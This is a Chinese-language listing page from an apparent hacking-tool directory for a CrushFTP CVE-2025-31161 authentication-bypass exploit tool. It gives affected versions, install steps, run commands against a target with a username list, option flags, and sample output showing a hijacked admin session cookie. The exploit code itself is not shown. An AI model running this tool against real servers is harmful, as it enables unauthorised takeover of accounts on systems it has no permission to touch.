Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-31161 — CrushFTP CVE-2025-31161 漏洞利用工具 🔓 | Kitploit
工具/GitHubGitHub/tx-one/cve-2025-31161
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 漏洞利用工具 🔓

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CrushFTP CVE-2025-31161 漏洞利用工具 🔓

针对存在漏洞的 CrushFTP 版本中 CVE-2025-31161 漏洞的高级检测与利用工具。


CVE-2025-31161 是 CrushFTP Web 界面中的一个严重身份验证绕过漏洞。通过操纵 HTTP 授权头,未经验证的攻击者可以在不提供正确密码的情况下,以任意有效用户名获得完全访问权限。

受影响版本

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

早于 9.3.12.5 的 CrushFTP 企业版

关键特性 🚀

  • 自动检测 CrushFTP 版本并验证漏洞
  • 多线程凭证测试,实现快速用户枚举
  • 支持双重身份验证方法(Bearer 令牌与基本身份验证)
  • 生成包含会话 Cookie 的 JSON 报告
  • 智能连接重试机制,支持自定义配置
  • 彩色控制台输出,附带详细日志记录
  • 涵盖的漏洞版本范围:
    • 9.3.8 至 9.3.12.5

环境要求 📋

  • Python 3.8+

  • 所需包:

    root@kitploit:~
    pip install requests colorama urllib3
    

    安装 🛠️

  1. 安装依赖:
root@kitploit:~
 pip install requests colorama urllib3
  1. 克隆仓库:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

使用说明 🖥️

基本命令:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

选项:

root@kitploit:~
-h, --help            显示此帮助信息并退出
  -t, --target TARGET   目标 URL(例如 https://example.com:8080)
  -u, --users USERS     包含用户名列表的文件
  -o, --output OUTPUT   输出 JSON 文件
  -T, --threads THREADS 线程数(默认:5)
  --no-ssl              禁用 SSL 验证
  --timeout TIMEOUT     请求超时时间(默认:15)
  --retries RETRIES     重试次数(默认:3)
  --force               绕过版本检查

高级示例:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

输出示例 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

免责声明: 本项目仅供教育和安全研究目的使用。使用时需承担相应责任。

下载工具